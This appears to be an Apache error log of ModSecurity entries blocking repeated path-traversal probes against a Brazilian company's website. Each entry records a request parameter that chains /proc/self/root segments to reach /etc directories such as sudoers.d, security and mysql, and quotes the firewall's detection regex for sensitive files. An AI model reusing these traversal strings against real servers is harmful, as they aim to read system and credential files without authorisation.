[Tue Mar 17 10:42:44.083653 2026] [:error] [pid 18380:tid 140411691570944] [client 74.7.243.203:50678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaVK4xEDsg_V3ESNY6sQAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:45.491405 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.243.203:50688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaVe82sZHvlq4xgHrKZAAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:46.890406 2026] [:error] [pid 18380:tid 140411540502272] [client 74.7.243.203:50694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaVq4xEDsg_V3ESNY6sgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:53.760973 2026] [:error] [pid 17965:tid 140411616036608] [client 74.7.243.203:50698] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaXat8Nd0UC_OcbVG2aQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:55.138853 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.243.203:39366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaXweiSKl8TjouI-YIjwAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:56.553162 2026] [:error] [pid 18604:tid 140411548894976] [client 74.7.243.203:39376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaYEBd0UqwxWindINvJwAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:58.966991 2026] [:error] [pid 18604:tid 140411699963648] [client 74.7.243.203:39390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaYkBd0UqwxWindINvLAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:01.496138 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.243.203:40918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaZKBJNF7axNlVR0UDywAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:05.293218 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.243.203:40934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaaaBJNF7axNlVR0UDzgAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:08.995926 2026] [:error] [pid 18709:tid 140411557287680] [client 74.7.243.203:40940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablabDarLhPAjZGI1b21EgAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:12.636781 2026] [:error] [pid 1731:tid 140411708356352] [client 74.7.243.203:45114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablacAb2qCuy5irgBMjPXwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:13.988291 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:45124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablace82sZHvlq4xgHrKagAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:16.498020 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.203:45126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abladAeiSKl8TjouI-YIlQAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:17.895884 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:45136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablada4xEDsg_V3ESNY6ugAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:19.259012 2026] [:error] [pid 1731:tid 140411590858496] [client 74.7.243.203:45152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abladwb2qCuy5irgBMjPYQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:21.818641 2026] [:error] [pid 1731:tid 140411641214720] [client 74.7.243.203:56940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaeQb2qCuy5irgBMjPYwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:23.168025 2026] [:error] [pid 18380:tid 140411599251200] [client 74.7.243.203:56950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablae64xEDsg_V3ESNY6vQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:26.366090 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:56958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablafa4xEDsg_V3ESNY6wAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:27.708758 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.243.203:56960] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaf-82sZHvlq4xgHrKbAAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:29.077997 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.243.203:56974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablagat8Nd0UC_OcbVG2hAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:31.515210 2026] [:error] [pid 18604:tid 140411683178240] [client 74.7.243.203:41434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablag0Bd0UqwxWindINvNgAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:43:31.698813 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:46242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablag9CmCSWTlPouqorTggAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
